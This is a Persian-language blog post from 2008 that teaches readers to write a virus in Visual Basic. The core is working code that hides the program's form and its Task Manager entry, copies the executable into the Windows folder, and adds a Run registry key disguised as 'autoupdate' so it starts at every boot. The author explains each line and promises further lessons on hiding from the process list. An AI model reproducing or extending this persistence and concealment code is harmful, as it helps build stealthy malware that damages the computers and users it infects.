یک ویروس برای اینکه بتونه کارهای مخربش رو انجام بده،باید هر لحظه اجرا باشه.یعنی از زمانی که ویندوز بار گزاری میشه تا وقتی که از ویندوز خارج می شویم.هر ویروسی باید خونه ای داشته باشه و تو اونجا زندگی کنه و خونه اش جایی باشه که نه کاربر به اون دسترسی داشته باشه و نه حذف بشه.پس بهترین جا،پوشه ی ویندوز است که بعضی ها از رفتن به آن خودداری می کنند زیرا می ترسن ویندوزشون خراب بشه.خوب،کار بعدی اینه که ویروس،هر بار ویندوز اجرا شد،اجرا بشه که این کمک می کنه تا ویروس،هر کاری بخواد بکنه.اول Visual Basic رو اجرا کنید و بعد standard exe و بعد هم در قسمت form_load کدهای زیر رو بنویسید.

Me.hide App.taskvisible = false Set fso = CreateObject("scripting.filesystemobject") Set windir = fso.getspecialfolder(0) file = App.Path & "\" & App.EXEName & ".exe" FileCopy file, windir & "\" & App.EXEName & ".exe" file2 = windir & "\" & App.EXEName & ".exe" Set Reg = CreateObject("wscript.shell") Reg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\run\autoupdate", file2

اگه از کدهای vb سردر نمیارید براتون توضیح میدم.

در خط اول کدی را وارد کردیم که باعث می شود form برنامه،در حین اجرا مخفی باشد و خط دوم باعث می شود تا برنامه،در لیست task های taskmanager مخفی باشد.در پست های بعد،آموزش مخفی کردن ویروس در لیست process های taskmanager رو می دم.در خط سوم،ما شئی fso رو برای دسترسی به فایل ها،فولدرهاو ...به برنامه معرفی کردیم.اگه این کارو نکنیم از قابلیت های این شئی برخوردار نمی شویم.در خط چهارم،از متد getspecialfolder برای بدست آوردن پوشه های حساس ویندوز استفاده می کنیم.اگه به جای صفر،یک بذاریم پوشه ی system 32 را به ما می دهد و اگر 2 بذاریم،پوشه ی temp ویندوز رو میده.در خط پنجم،مسیر فایل خودمون رو بدست آوردیم و اگه این کارو نکنیم،نمی تونیم فایل یا ویروسمون رو کپی کنیم.در خط ششم فایل را کپی کرده و در خط هفتم مسیر فایل کپی شده را به برنامه می دهیم چون برای گذاشتن مسیر فایل در ریجیستری به آن نیاز مندیم و در خط بعدی،شیئی را به برنامه معرفی کرده ایم که باعث می شود بتوانیم به ریجیستری دسترسی داشته یاشیم و در خط آخر هم،مسیر فایل کپی شده را در قسمتی خاص در ریجیستری می گذاریم.ریجیستری مکانی است که حیات ویندوز به آن وابسته است و کارهای اصلی ویندوز به وسیله ی آن صورت می گیرد و برای دسترسی به ریجیستری در run عبارت regedit رو تایپ کنید.

امیدوارم از این مطالب،لذت برده باشید.

 نوشته شده در  سه شنبه یازدهم تیر 1387 ساعت 18:30 ارسال شده توسط :  F@rshid